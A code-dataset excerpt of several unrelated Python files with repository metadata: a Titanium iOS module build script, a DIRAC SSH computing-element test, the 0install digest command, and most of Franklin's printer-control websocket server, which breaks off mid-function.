	Skips entries in ignoreDirs/ignoreFiles and any file whose extension
	appears in ignoreExt. NOTE(review): the mutable default for ignoreExt
	is only ever read, never mutated, so it is safe here.
	"""
	if not os.path.exists(dir): return
	for root, dirs, files in os.walk(dir):
		for name in ignoreDirs:
			if name in dirs:
				dirs.remove(name) # don't visit ignored directories
		for file in files:
			if file in ignoreFiles: continue
			# e is (root, ext); skip files with an ignored extension
			e = os.path.splitext(file)
			if len(e) == 2 and e[1] in ignoreExt: continue
			from_ = os.path.join(root, file)
			# rewrite the archive path so the entry lands under basepath
			to_ = from_.replace(dir, '%s/%s'%(basepath,dir), 1)
			zf.write(from_, to_)
def glob_libfiles():
	"""Return the paths of all Release static libraries under build/."""
	return [libfile for libfile in glob.glob('build/**/*.a')
			if libfile.find('Release-') != -1]
def build_module(manifest,config):
	"""Build device and simulator Release libraries, then merge them
	into a single fat library with lipo."""
	from tools import ensure_dev_path
	ensure_dev_path()
	rc = os.system("xcodebuild -sdk iphoneos -configuration Release")
	if rc != 0:
		die("xcodebuild failed")
	rc = os.system("xcodebuild -sdk iphonesimulator -configuration Release")
	if rc != 0:
		die("xcodebuild failed")
	# build the merged (multi-architecture) library using lipo
	moduleid = manifest['moduleid']
	libpaths = ''
	for libfile in glob_libfiles():
		libpaths+='%s ' % libfile
	os.system("lipo %s -create -output build/lib%s.a" %(libpaths,moduleid))
def package_module(manifest,mf,config):
	"""Assemble the distributable <moduleid>-iphone-<version>.zip archive."""
	name = manifest['name'].lower()  # NOTE(review): unused
	moduleid = manifest['moduleid'].lower()
	version = manifest['version']
	modulezip = '%s-iphone-%s.zip' % (moduleid,version)
	# start from a clean archive
	if os.path.exists(modulezip): os.remove(modulezip)
	zf = zipfile.ZipFile(modulezip, 'w', zipfile.ZIP_DEFLATED)
	modulepath = 'modules/iphone/%s/%s' % (moduleid,version)
	zf.write(mf,'%s/manifest' % modulepath)
	libname = 'lib%s.a' % moduleid
	zf.write('build/%s' % libname, '%s/%s' % (modulepath,libname))
	docs = generate_doc(config)
	if docs!=None:
		for doc in docs:
			# each doc is a {filename: html} dict (Python 2 iteritems)
			for file, html in doc.iteritems():
				filename = string.replace(file,'.md','.html')
				zf.writestr('%s/documentation/%s'%(modulepath,filename),html)
	zip_dir(zf,'assets',modulepath,['.pyc','.js'])
	zip_dir(zf,'example',modulepath,['.pyc'])
	zip_dir(zf,'platform',modulepath,['.pyc','.js'])
	zf.write('LICENSE','%s/LICENSE' % modulepath)
	zf.write('module.xcconfig','%s/module.xcconfig' % modulepath)
	exports_file = 'metadata.json'
	if os.path.exists(exports_file):
		zf.write(exports_file, '%s/%s' % (modulepath, exports_file))
	zf.close()
if __name__ == '__main__':
	# Packaging pipeline: validate inputs, read config, locate the SDK,
	# then compile JS assets, build the libraries and produce the zip.
	manifest,mf = validate_manifest()
	validate_license()
	config = read_ti_xcconfig()
	sdk = find_sdk(config)
	# make the SDK's python tooling importable
	sys.path.insert(0,os.path.join(sdk,'iphone'))
	sys.path.append(os.path.join(sdk, "common"))
	compile_js(manifest,config)
	build_module(manifest,config)
	package_module(manifest,mf,config)
	sys.exit(0)
|
delapecci/titanium-modules
|
ios7media/build.py
|
Python
|
mit
| 6,797
|
[
"VisIt"
] |
c5c1d5154e96bea8890a1ebbc5a88eee3587a306bbde4ee876b20acb91f3478e
|
#!/bin/env python
"""
tests for SSHComputingElement module
"""
import os
import shutil
import subprocess32 as subprocess
import shlex
import pytest
import DIRAC
from DIRAC.Resources.Computing.SSHComputingElement import SSHComputingElement
from DIRAC.Resources.Computing.BatchSystems.executeBatch import executeBatchContent
@pytest.mark.parametrize("batchSystem", ["Condor", "GE", "Host", "LSF", "OAR", "SLURM", "Torque"])
def test_generateControlScript(batchSystem):
    """Test that the control script generated by the merging operation
    between a BatchSystem and executeBatch.py is:

    * complete: contains the content of both files
    * executable and doesn't raise any syntax error.

    Example: it may check that a __future__ import is not misplaced in the script due to the
    merging of the files.
    """
    ce = SSHComputingElement("Test_SSHCE")
    # Change the batch system file used during the control script generation
    ce.loadBatchSystem(batchSystem)
    # Get the local control script
    result = ce._generateControlScript()
    assert result["OK"] is True
    source = result["Value"]
    dest = "execute_batch.py"
    # Simulate operation done by the scpCall method
    # Copy the local control script into the "remote" control script
    # As the source can be composed of multiple files, we have to copy the content of each file
    sources = source.split(" ")
    with open(dest, "wb") as dst:
        for sourceFile in sources:
            with open(sourceFile, "rb") as src:
                shutil.copyfileobj(src, dst)
    # Test that the control script is complete: it must embed both the
    # executeBatch content and the selected batch system module verbatim.
    with open(dest, "r") as dst:
        dataDest = dst.read()
    batchSystemDir = os.path.join(os.path.dirname(DIRAC.__file__), "Resources", "Computing", "BatchSystems")
    batchSystemScript = os.path.join(batchSystemDir, "%s.py" % batchSystem)
    with open(batchSystemScript, "r") as bsc:
        dataBatchSystemScript = bsc.read()
    assert executeBatchContent in dataDest
    assert dataBatchSystemScript in dataDest
    # Test the execution of the remote control script.
    # py_compile only checks that the merged script parses; it is not run.
    cmd = "python -m py_compile %s" % dest
    args = shlex.split(cmd)
    process = subprocess.Popen(args, universal_newlines=True)
    process.communicate()
    assert process.returncode == 0
    # Delete the control script and the .pyc file associated
    os.remove(source)
    os.remove(dest)
    if os.path.isfile("%sc" % dest):
        os.remove("%sc" % dest)
|
DIRACGrid/DIRAC
|
src/DIRAC/Resources/Computing/test/Test_SSHComputingElement.py
|
Python
|
gpl-3.0
| 2,459
|
[
"DIRAC"
] |
8b41a3a9eb0cabd04daf914a2584b40a6c316c263ad6dfcd37f0d8cf5d3b9da7
|
"""
The B{0install digest} command-line interface.
"""
# Copyright (C) 2011, Thomas Leonard
# See the README file for details, or visit http://0install.net.
from __future__ import print_function
import os, tempfile
from zeroinstall import SafeException, _
from zeroinstall.zerostore import manifest, unpack
from zeroinstall.cmd import UsageError
from zeroinstall import support
syntax = "DIRECTORY | ARCHIVE [EXTRACT]"
def add_options(parser):
	"""Register the command-line options for the digest subcommand."""
	parser.add_option("", "--algorithm", help=_("the hash function to use"), metavar="HASH")
	parser.add_option("-m", "--manifest", help=_("print the manifest"), action='store_true')
	parser.add_option("-d", "--digest", help=_("print the digest"), action='store_true')
def handle(config, options, args):
	"""Handle '0install digest DIRECTORY | ARCHIVE [EXTRACT]'.

	Prints the manifest and/or digest of a directory, or of an
	archive's contents (optionally a single extracted subdirectory).

	@type args: [str]"""
	if len(args) == 1:
		extract = None
	elif len(args) == 2:
		extract = args[1]
	else:
		raise UsageError()
	source = args[0]
	# default algorithm is sha1new
	alg = manifest.algorithms.get(options.algorithm or 'sha1new', None)
	if alg is None:
		# NOTE(review): this formats the looked-up value (always None here)
		# rather than the requested name; options.algorithm would be clearer.
		raise SafeException(_('Unknown algorithm "%s"') % alg)
	show_manifest = bool(options.manifest)
	# with neither flag given, print just the digest
	show_digest = bool(options.digest) or not show_manifest
	def do_manifest(d):
		# Stream the manifest lines, feeding the digest as we go.
		if extract is not None:
			d = os.path.join(d, extract)
		digest = alg.new_digest()
		for line in alg.generate_manifest(d):
			if show_manifest:
				print(line)
			digest.update((line + '\n').encode('utf-8'))
		if show_digest:
			print(alg.getID(digest))
	if os.path.isdir(source):
		if extract is not None:
			raise SafeException("Can't use extract with a directory")
		do_manifest(source)
	else:
		# Archive: unpack to a temp dir, digest it, then clean up.
		data = None
		tmpdir = tempfile.mkdtemp()
		try:
			data = open(args[0], 'rb')
			unpack.unpack_archive(source, data, tmpdir, extract)
			do_manifest(tmpdir)
		finally:
			support.ro_rmtree(tmpdir)
			if data:
				data.close()
def complete(completion, args, cword):
	"""Shell completion for the digest subcommand.

	@type completion: L{zeroinstall.cmd._Completion}
	@type args: [str]
	@type cword: int"""
	# Only the first argument (a file or directory) can be completed.
	if len(args) != 1:
		return
	completion.expand_files()
|
slovenwd/0install
|
zeroinstall/cmd/digest.py
|
Python
|
lgpl-2.1
| 1,983
|
[
"VisIt"
] |
c733abcf24fe0656062e229a984c8ae2a8cfd8af35848332a84f26ad6bda390a
|
#!/usr/bin/python3
# vim: foldmethod=marker :
# Documentation. {{{
# server.py - machine multiplexing for Franklin {{{
# Copyright 2014-2016 Michigan Technological University
# Copyright 2016 Bas Wijnen <wijnen@debian.org>
# Copyright 2017 Lorin Edwin Parker <lorin.parker@hive13.org>
# Author: Bas Wijnen <wijnen@debian.org>
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
# }}}
# File documentation. {{{
'''@file
This is the main program. It runs a WebSockets server and starts driver.py
processes when new machines are detected. It sends any requests it doesn't
handle itself to those processes.
This file is installed as "franklin" in the executable path. When run, it
accepts the following options (prefix with "--" on the commandline, or use as
is in a configuration file):
* port: which port to listen on for requests. Default: 8000
* address: which address to bind to. If set to empty, it binds the both
0.0.0.0 and ::1, so it responds to both IPv4 and IPv6 requests. If IPv6 is
not supported (this is currently the case on the Raspberry Pi), you need to
explicitly set it to 0.0.0.0 or the server will not start. This can also be
used to listen only on one interface, by setting it to the local address of
that interface. Default: ''
* machine: default machine for new client connections. Leave empty to use the
first detected machine. Default: ''
* blacklist: regular expression of serial ports that detection should not be
attempted on. This should normally not be used. add-blacklist should be
used instead.
* add-blacklist: same as blacklist. However, add-blacklist has a empty
default, so it can be used to add ports to the standard blacklist, as opposed
to replacing it.
* noautodetect: if not set, communication is attempted on newly detected ports.
This is normally good, but it can be disabled if autodetection prevents
flashing new firmware, or if it is unclear which ports should be blacklisted
and Franklin must not interfere with some ports. Default: True
* predetect: system command that is run before detection is attempted. The
substring #PORT# is replaced with the port. Use this to set up the port.
Default: ``stty -F #PORT# raw 115200 -echo -echoe -echok -echoke -echonl -echoprt``
* allow-system: regular expression for commands that are allowed to be run from
G-Code. Default: '^$'
* admin: Credentials for accessing the /admin interface. This can either be a
password, or a username:password pair. If only a password is supplied, any
username is accepted with that password. Default: ''
* expert: Credentials for accessing the /expert interface. This can either be a
password, or a username:password pair. If only a password is supplied, any
username is accepted with that password. Default: ''
* user: Credentials for accessing the default interface. This can either be a
password, or a username:password pair. If only a password is supplied, any
username is accepted with that password. Default: ''
* done: system command to run after completing a job. Default: ''
* log: passed on to the websockets server, which uses it to create a log file
with websockets traffic.
* tls: passed on to the websockets server, which uses it to enable encryption.
Default: True
'''
# }}}
# Main page documentation. {{{
'''@mainpage
This is the documentation for Franklin that was generated from its source code.
It is meant to help people make changes to the code, and as a reference for
people who write programs that access Franklin with a WebSocket.
For the latter purpose, most of this documentation should be ignored. Two
classes are useful: Connection and Machine. Functions from those classes can
be called using RPC requests. In Machine, functions with a role prefix must be
called by a connections with at least those permissions. The prefix must not
be part of the RPC request.
'''
# }}}
# }}}
# Imports and config. {{{
import re
import os
import sys
import math
import random
import network
import websocketd
from websocketd import log
import fhs
import subprocess
import crypt
import time
import serial
import json
import traceback
import fcntl
import protocol
# Configuration options; fhs merges defaults, configuration files and the command line.
fhs.option('port', 'Port to listen on', default = '8000')
fhs.option('address', 'Address to listen on. Set to 0.0.0.0 to force IPv4 only', default = '')
fhs.option('whitelist', 'If set, only allow serial ports that match this regular expression', default = '')
fhs.option('blacklist', 'Disallow serial ports that match this regular expression', default = r'/dev/(input/.*|ptmx|console|tty(printk|(GS)?\d*))$')
fhs.option('add-blacklist', 'Also disallow serial ports that match this regular expression', default = r'^$')
fhs.option('noautodetect', 'Do not autodetect machines on new serial ports', argtype = bool)
# The predetect/controller commands run through the shell with PORT exported
# in their environment (see detect()), so $PORT expands to the port name.
fhs.option('predetect', 'Run this command prior to detecting a machine on a serial port', default = 'stty -F $PORT raw 115200 -echo -echoe -echok -echoke -echonl -echoprt')
fhs.option('controller', 'Run this command to handle a controller on a serial port', default = '/usr/lib/franklin/controller.py --dev "$PORT"')
fhs.option('allow-system', 'Only allow system commands that match this regular expression', default = '^$')
# Role passwords; an empty string means no password is required for that role.
fhs.option('admin', 'Admin password', default = '')
fhs.option('expert', 'Expert user password', default = '')
fhs.option('user', 'Local user password', default = '')
fhs.option('remote', 'Remote user password', default = '')
fhs.option('done', 'Run this command when a job is done', default = '')
fhs.option('log', 'Enable logging to a given logfile')
fhs.option('tls', 'Enable TLS. It is recommended to let Apache handle this', argtype = bool)
config = fhs.init(packagename = 'franklin')
# }}}
# Global variables. {{{
httpd = None	# The Server instance; created in the main loop section below.
ports = {}	# port name -> uuid of the connected machine, None if the port is free, or a cancel callable while detection/upload is in progress.
autodetect = not config['noautodetect']	# Whether new ports are probed automatically.
tls = config['tls']	# Passed to the websockets server to enable encryption.
machines = {}	# uuid -> Machine object for every known machine.
log('whitelist: %s' % config['whitelist'])
# }}}
class Server(websocketd.RPChttpd): # {{{
	'''HTTP and websocket server for Franklin.
	Handles authentication for the role-specific interfaces, serves the
	web pages, answers export requests and accepts file uploads (POST).
	'''
	def auth_message(self, connection, is_websocket):
		'''Select role and password for a new connection.
		The role is derived from the requested path; it is escalated to
		the highest role that has no password configured, and if the
		selected role has no password, the strongest configured lower
		role's password is required instead.
		@return the authentication prompt, or None if no password is needed.
		'''
		path = connection.address.path
		for extra in ('/', '/websocket'):
			if path.endswith(extra):
				path = path[:-len(extra)]
		if path.endswith('/benjamin'):
			connection.data['role'] = 'benjamin'
			escalate = ()
			down = ('admin', 'expert', 'user', 'remote',)
		elif path.endswith('/admin'):
			connection.data['role'] = 'admin'
			escalate = ()
			down = ('expert', 'user', 'remote',)
		elif path.endswith('/expert'):
			connection.data['role'] = 'expert'
			escalate = ('admin',)
			down = ('user', 'remote',)
		elif path.endswith('/user'):
			connection.data['role'] = 'user'
			escalate = ('expert', 'admin',)
			down = ('remote',)
		else:
			connection.data['role'] = 'remote'
			escalate = ('user', 'expert', 'admin',)
			down = ()
		# Escalate through roles without a configured password.
		for role in escalate:
			if config[role]:
				break
			connection.data['role'] = role
		connection.data['pwd'] = config[connection.data['role'] if connection.data['role'] != 'benjamin' else 'admin']
		if not connection.data['pwd']:
			# No password for this role; require the first configured lower-role password.
			for role in down:
				if config[role]:
					connection.data['pwd'] = config[role]
					break
		return 'Please identify yourself for %s access' % connection.data['role'] if connection.data['pwd'] else None
	def authenticate(self, connection):
		'''Check supplied credentials against the password selected by auth_message.'''
		if ':' in connection.data['pwd']:
			# A username:password pair was configured.
			return [connection.data['user'], connection.data['password']] == connection.data['pwd'].split(':', 1)
		else:
			# Only a password was configured; any username is accepted.
			return connection.data['password'] == connection.data['pwd']
	def page(self, connection):
		'''Serve a web page, an exported settings file, or the adc dump.'''
		if 'machine' in connection.query:
			# Export request.
			machine = connection.query['machine'][0]
			if machine not in machines or not isinstance(machines[machine], Machine):
				self.reply(connection, 404)
			else:
				def export_reply(success, message):
					self.reply(connection, 200, message.encode('utf-8'), 'text/plain;charset=utf-8')
					connection.socket.close()
				machines[machine].call('export_settings', (connection.data['role'],), {}, export_reply)
			return True
		elif connection.address.path.endswith('/adc'):
			filename = '/tmp/franklin-adc-dump' # FIXME
			if os.path.exists(filename):
				message = open(filename, 'rb').read()
				os.unlink(filename)
			else:
				message = b''
			self.reply(connection, 200, message, 'text/plain;charset=utf-8')
		elif any(connection.address.path.endswith('/' + x) for x in ('benjamin', 'admin', 'expert', 'user')):
			# Strip the role suffix so the normal pages are served.
			websocketd.RPChttpd.page(self, connection, path = connection.address.path[:connection.address.path.rfind('/') + 1])
		else:
			websocketd.RPChttpd.page(self, connection)
	def post(self, connection):
		'''Handle a POST request: add files to a queue, or import settings.'''
		if 'file' not in connection.post[1] or 'machine' not in connection.post[0] or 'action' not in connection.post[0]:
			log('invalid post: {}'.format(connection.post))
			self.reply(connection, 400)
			return False
		machine = connection.post[0]['machine'][0]
		action = connection.post[0]['action'][0]
		if machine not in machines or not isinstance(machines[machine], Machine):
			log('machine not found: %s' % machine)
			self.reply(connection, 404)
			return False
		# Count files, so we know when the connection should be closed.
		# Use a list to make it accessible from the callback.
		num = [len(connection.post[1]['file'])]
		for post in connection.post[1].pop('file'):
			def cb(success, ret, filename):
				self.reply(connection, 200 if success else 400, b'' if ret is None else ret.encode('utf-8'), 'text/plain;charset=utf-8')
				os.unlink(filename)
				num[0] -= 1
				if num[0] == 0:
					connection.socket.close()
			def cbwrap(filename):
				'''This function makes sure that filename gets its own scope and is not changed by the for loop.'''
				return lambda success, ret: cb(success, ret, filename)
			if action == 'queue_add':
				machines[machine].call('queue_add_POST', [connection.data['role'], post[0], post[1]], {}, cbwrap(post[0]))
			elif action == 'probe_add':
				machines[machine].call('probe_add_POST', [connection.data['role'], post[0], post[1]], {}, cbwrap(post[0]))
			elif action == 'audio_add':
				machines[machine].call('audio_add_POST', [connection.data['role'], post[0], post[1]], {}, cbwrap(post[0]))
			elif action == 'import':
				machines[machine].call('import_POST', [connection.data['role'], post[0], post[1]], {}, cbwrap(post[0]))
			else:
				# Bug fix: this was cb(false, ...), which raised NameError
				# instead of replying 400; Python spells the constant False.
				cb(False, 'invalid POST action', post[0])
		return True
	# }}}
class Connection: # {{{
	'''Object to handle a single network connection.
	This class is used with the WebSocket RPC server. Functions in it can
	be called from the remote end using RPC requests.
	'''
	## Currently active connections. Keys are their id, an int for internal use.
	connections = {}
	## Id for next connection.
	nextid = 0
	def __init__(self, socket): # {{{
		'''Constructor, as required by python-websockets.
		@param socket: remote end of RPC connection.
		'''
		socket.initialized = False
		socket.monitor = False
		socket.connection = self
		self.socket = socket
		self.id = Connection.nextid
		Connection.nextid += 1
		Connection.connections[self.id] = self
		# Done with setup; activate connection.
		self.socket()
	# }}}
	def get_ports(self): # {{{
		'''Return the names of all known serial ports.'''
		return tuple(ports.keys())
	# }}}
	def get_machines(self): # {{{
		'''Return the uuids of all known machines.'''
		return tuple(machines.keys())
	# }}}
	def detect(self, port): # {{{
		'''Start machine detection on a port.'''
		return detect(port)
	# }}}
	def disable(self, machine, reason = 'disabled by user'): # {{{
		'''Disconnect a machine from its port.  Requires at least expert access.'''
		assert self.socket.data['role'] in ('benjamin', 'admin', 'expert')
		assert machine in machines
		assert machines[machine].port
		return disable(machine, reason)
	# }}}
	def remove_machine(self, machine): # {{{
		'''Permanently remove a machine.  Requires admin access.'''
		assert self.socket.data['role'] in ('benjamin', 'admin')
		assert machine in machines
		machines[machine].remove_machine()
	# }}}
	def _get_command(self, board, port): # {{{
		'''Build the command line that flashes firmware for board onto port.
		Board names with a trailing space are special flash scripts run as
		root; all other boards are flashed with avrdude using the Arduino
		board definitions from read_boards().
		Raises ValueError for an unknown board and NotImplementedError when
		no firmware image is installed for it.
		'''
		if board == 'bbbmelzi ':
			return ('sudo', fhs.read_data(os.path.join('bb', 'flash-bb-0'), opened = False), fhs.read_data(os.path.join('bb', 'avrdude.conf'), opened = False), fhs.read_data(os.path.join('firmware', 'atmega1284p' + os.extsep + 'hex'), opened = False))
		if board == 'bb4melzi ':
			return ('sudo', fhs.read_data(os.path.join('bb', 'flash-bb-4'), opened = False), fhs.read_data(os.path.join('bb', 'avrdude.conf'), opened = False), fhs.read_data(os.path.join('firmware', 'atmega1284p' + os.extsep + 'hex'), opened = False))
		if board == 'opi ':
			return ('sudo', fhs.read_data(os.path.join('opi', 'flash-opi'), opened = False), fhs.read_data(os.path.join('opi', 'avrdude.conf'), opened = False), fhs.read_data(os.path.join('firmware', 'atmega1284p-12MHz' + os.extsep + 'hex'), opened = False))
		boards = read_boards()
		if board not in boards:
			raise ValueError('board type not supported')
		filename = fhs.read_data(os.path.join('firmware', boards[board]['build.mcu'] + os.extsep + 'hex'), opened = False)
		if filename is None:
			raise NotImplementedError('Firmware is not available')
		return ('avrdude', '-D', '-q', '-q', '-p', boards[board]['build.mcu'], '-C', '/etc/avrdude.conf', '-b', boards[board]['upload.speed'], '-c', boards[board]['upload.protocol'], '-P', port, '-U', 'flash:w:' + filename + ':i')
	# }}}
	def upload(self, port, board): # {{{
		'''Flash firmware onto a machine on the given port.  Requires admin access.
		This is a generator-style RPC: it is resumed when the flash
		process produces output or terminates.  While it runs, ports[port]
		holds a cancel callable.
		'''
		wake = (yield)
		assert self.socket.data['role'] in ('benjamin', 'admin')
		assert port in ports
		if ports[port]:
			disable(ports[port], 'disabled for upload')
		def cancel():
			# Waking the generator kills the process.
			wake('Aborted')
		ports[port] = cancel
		command = self._get_command(board, port)
		data = ['']	# Accumulated process output; a list so the closures can mutate it.
		log('Flashing firmware: ' + ' '.join(command))
		broadcast(None, 'port_state', port, 3)
		process = subprocess.Popen(command, stdin = subprocess.PIPE, stdout = subprocess.PIPE, stderr = subprocess.STDOUT, close_fds = True)
		def output():
			# Read callback: collect flasher output; wake the generator when done.
			d = ''
			try:
				d = process.stdout.read().decode('utf-8')
			except:
				data[0] += '\nError writing %s firmware: ' % board + traceback.format_exc()
				log(repr(data[0]))
				wake(data[0])
				return False
			if d != '':
				#broadcast(None, 'message', port, '\n'.join(data[0].split('\n')[-4:]))
				data[0] += d
				return True
			wake(data[0])
			return False
		def error():
			# Error callback for the flasher's stdout.
			data[0] += '\nError writing %s firmware: ' % board
			log(repr(data[0]))
			wake(data[0])
			return False
		# Make the flasher's stdout non-blocking so the event loop can poll it.
		fl = fcntl.fcntl(process.stdout.fileno(), fcntl.F_GETFL)
		fcntl.fcntl(process.stdout.fileno(), fcntl.F_SETFL, fl | os.O_NONBLOCK)
		websocketd.add_read(process.stdout, output, error)
		broadcast(None, 'uploading', port, 'uploading firmware for %s' % board)
		#broadcast(None, 'message', port, '')
		d = (yield)
		try:
			process.kill() # In case it wasn't dead yet.
		except:
			pass
		try:
			process.communicate() # Clean up.
		except:
			pass
		broadcast(None, 'uploading', port, None)
		#broadcast(None, 'message', port, '')
		broadcast(None, 'port_state', port, 0)
		ports[port] = None
		if autodetect:
			websocketd.call(None, detect, port)
		if d:
			return 'firmware upload for %s: ' % board + d
		else:
			return 'firmware for %s successfully uploaded' % board
	# }}}
	def upload_options(self, port): # {{{
		'''Return the list of flashable board options for a port.'''
		return upload_options(port)
	# }}}
	def create_machine(self): # {{{
		'''Start a new driver process with a fresh uuid.'''
		create_machine()
	# }}}
	def set_monitor(self, value): # {{{
		'''Enable or disable event monitoring; on enable, replay current state.'''
		if value:
			self.socket.initialized = False
			self.socket.autodetect.event(autodetect)
			for p in ports:
				self.socket.new_port.event(p, self.upload_options(p))
				if ports[p] is None:
					self.socket.port_state.event(p, 0)
				elif not isinstance(ports[p], str): # TODO: distinguish initial detect from flashing.
					self.socket.port_state.event(p, 3)
				else:
					self.socket.port_state.event(p, 2)
			for p in machines:
				machines[p].call('send_machine', [self.socket.data['role'], self.id], {}, lambda success, data: None)
			self.socket.initialized = True
		self.socket.monitor = value
	# }}}
	def get_monitor(self): # {{{
		'''Return whether this connection receives broadcast events.'''
		return self.socket.monitor
	# }}}
	def get_role(self): # {{{
		'''Return the role of this connection.'''
		return self.socket.data['role']
	# }}}
	def _call(self, name, a, ka): # {{{
		'''Forward an RPC request to a machine's driver process.
		The target machine may be passed as keyword argument 'machine';
		otherwise the single (active) machine is used.
		'''
		wake = (yield)
		#log('other: %s %s %s' % (name, repr(a), repr(ka)))
		if 'machine' in ka:
			machine = ka.pop('machine')
		else:
			machine = None
		if machine not in machines:
			# No explicit target; pick the only machine, or the only active one.
			if len(machines) == 1:
				machine = tuple(machines.keys())[0]
			else:
				options = [m for m in machines if machines[m].port is not None]
				if len(options) == 1:
					machine = options[0]
				else:
					log('No active machine')
					return ('error', 'No active machine')
		if name.endswith('_POST'):
			log('refusing to call function only meant for POST')
			return ('error', 'Invalid function name')
		def reply(success, ret):
			if success:
				wake(ret)
			else:
				log('machine errors')
				wake(('error', ret))
				#disable(machine, 'machine replied with error to wake up')
		machines[machine].call(name, (self.socket.data['role'],) + tuple(a), ka, reply)
		return (yield)
	# }}}
	def __getattr__ (self, attr): # {{{
		'''Any unknown method is forwarded to the machine driver via _call.'''
		return lambda *a, **ka: self._call(attr, a, ka)
	# }}}
# }}}
def read_boards(): # {{{
	'''Read Arduino board definitions.
	Parse boards.txt from every installed Arduino hardware directory and
	return a dict mapping board tag to its property dict.  Boards with
	incomplete definitions, too little flash, or no installed firmware
	image are removed from the result.
	'''
	boards = {}
	for d in fhs.read_data('hardware', packagename = 'arduino', dir = True, multiple = True):
		for board in os.listdir(d):
			boards_txt = os.path.join(d, board, 'boards' + os.extsep + 'txt')
			if not os.path.exists(boards_txt):
				continue
			with open(boards_txt) as b:
				for line in b:
					if line.startswith('#') or line.strip() == '':
						continue
					# Fix: use a raw string; '\.' in a normal string
					# literal is an invalid escape sequence.
					parse = re.match(r'([^.=]+)\.([^=]+)=(.*)$', line.strip())
					if parse is None:
						log('Warning: invalid line in %s: %s' % (boards_txt, line.strip()))
						continue
					tag, option, value = parse.groups()
					if tag not in boards:
						boards[tag] = {}
					if option in boards[tag]:
						# Keep the first value of a duplicate option.
						if boards[tag][option] != value:
							log('%s: duplicate tag %s.%s with different value (%s != %s); using %s' % (boards_txt, tag, option, value, boards[tag][option], boards[tag][option]))
						continue
					boards[tag][option] = value
	for tag in tuple(boards.keys()):
		if 'name' not in boards[tag]:
			boards[tag]['name'] = tag
		if any(x not in boards[tag] for x in ('upload.protocol', 'upload.speed', 'build.mcu', 'upload.maximum_size')):
			#log('skipping %s because hardware information is incomplete (%s)' % (boards[tag]['name'], repr(boards[tag])))
			del boards[tag]
			continue
		if int(boards[tag]['upload.maximum_size']) < 30000:
			# Not enough memory; don't complain about skipping this board.
			del boards[tag]
			continue
		if fhs.read_data(os.path.join('firmware', boards[tag]['build.mcu'] + os.extsep + 'hex'), opened = False) is None:
			#log('skipping %s because firmware for %s is not installed' % (boards[tag]['name'], boards[tag]['build.mcu']))
			del boards[tag]
			continue
	return boards
# }}}
def upload_options(port): # {{{
	'''Return a sorted list of (board id, description) pairs for a port.
	Special bridge-board ports get their dedicated flash scripts first;
	all Arduino boards with installed firmware are always offered.
	'''
	special = {
		'/dev/ttyS0': ('bbbmelzi ', 'Melzi from BeagleBone (atmega1284p, bridgeboard v1)'),
		'/dev/ttyO0': ('bbbmelzi ', 'Melzi from BeagleBone (atmega1284p, bridgeboard v1)'),
		'/dev/ttyS4': ('bb4melzi ', 'Melzi from BeagleBone (atmega1284p, bridgeboard v2)'),
		'/dev/ttyO4': ('bb4melzi ', 'Melzi from BeagleBone (atmega1284p, bridgeboard v2)'),
		'/dev/ttyS1': ('opi ', 'Athena on OrangePi Zero (atmega1284p at 12MHz)'),
	}
	options = []
	if port in special:
		options.append(special[port])
	boards = read_boards()
	for tag in boards:
		info = boards[tag]
		options.append((tag, '%s (%s, %s, %d baud)' % (info['name'], info['build.mcu'], info['upload.protocol'], int(info['upload.speed']))))
	def sort_key(entry):
		tag, description = entry
		return (boards[tag]['build.mcu'] if tag in boards else '', description)
	options.sort(key = sort_key)
	return options
# }}}
def broadcast(target, name, *args): # {{{
	'''Send an event to one or all monitoring connections.
	@param target: connection id to send to, or None for all monitors.
	@param name: event name; the remote end's handler of that name is fired.
	'''
	if target is None:
		# Broadcast to every initialized monitoring websocket.
		if httpd:
			#log('broadcasting to all: %s' % repr((name, args)))
			for c in httpd.websockets:
				if c.monitor and c.initialized:
					#log('broadcasting to one')
					getattr(c, name).event(*args)
		return
	#log('broadcasting to target %d' % target)
	if target not in Connection.connections:
		log('ignoring targeted broadcast of %s to missing connection %s' % (repr((name, args)), target))
		return
	sock = Connection.connections[target].socket
	if sock.monitor:
		#log('%s %s' % (name, repr(args)))
		getattr(sock, name).event(*args)
	else:
		log("not broadcasting to target, because it isn't set to monitor")
# }}}
class Machine: # {{{
	'''Proxy for a machine driver process.
	Requests are serialized as JSON over the driver's stdin; replies and
	events arrive as JSON lines on its stdout.  Reply callbacks are kept
	in self.waiters until the matching message id comes back.
	'''
	def __init__(self, port, process, run_id, send = True): # {{{
		'''Create a new Machine object.
		This can be called for several reasons:
		- At startup, every saved machine is started. In this case, port is None.
		- When a new machine with an unknown uuid is detected on a port. In this case, port and run_id are set.
		'''
		if port is not None:
			self.detecting = True
			broadcast(None, 'port_state', port, 1)
		self.name = None
		self.uuid = None
		self.port = port
		self.run_id = run_id
		self.process = process
		# Pending callbacks, keyed by message id: (rpc replies, movecbs, tempcbs).
		self.waiters = ({}, {}, {})
		self.next_mid = 0
		self.buffer = b''
		# Make the driver's stdout non-blocking so the event loop can poll it.
		fl = fcntl.fcntl(process.stdout.fileno(), fcntl.F_GETFL)
		fcntl.fcntl(process.stdout.fileno(), fcntl.F_SETFL, fl | os.O_NONBLOCK)
		self.input_handle = websocketd.add_read(process.stdout, self.machine_input, self.machine_error)
		def get_vars(success, vars, cb = None):
			# Record the uuid reported by the driver and notify the clients.
			if not success:
				log('failed to get vars')
				return
			if self.uuid is None:
				log('new uuid:' + repr(vars['uuid']))
				self.uuid = vars['uuid']
			else:
				assert self.uuid == vars['uuid']
			self.detecting = False
			self.call('send_machine', ['admin', None], {}, lambda success, data: broadcast(None, 'port_state', port, 2))
			if cb is not None:
				cb()
		if send:
			self.call('get_globals', ('admin',), {}, get_vars)
		else:
			# Caller will invoke self.finish(cb) when it is ready; the
			# attribute removes itself so it can only be used once.
			def finish(cb):
				self.call('get_globals', ('admin',), {}, lambda success, vars: get_vars(success, vars, cb))
				del self.finish
			self.finish = finish
	# }}}
	def call(self, name, args, kargs, cb): # {{{
		'''Send an RPC request to the driver; cb(success, result) receives the reply.'''
		#log('calling {}'.format(repr((name, args, kargs))))
		data = json.dumps([self.next_mid, name, args, kargs]) + '\n'
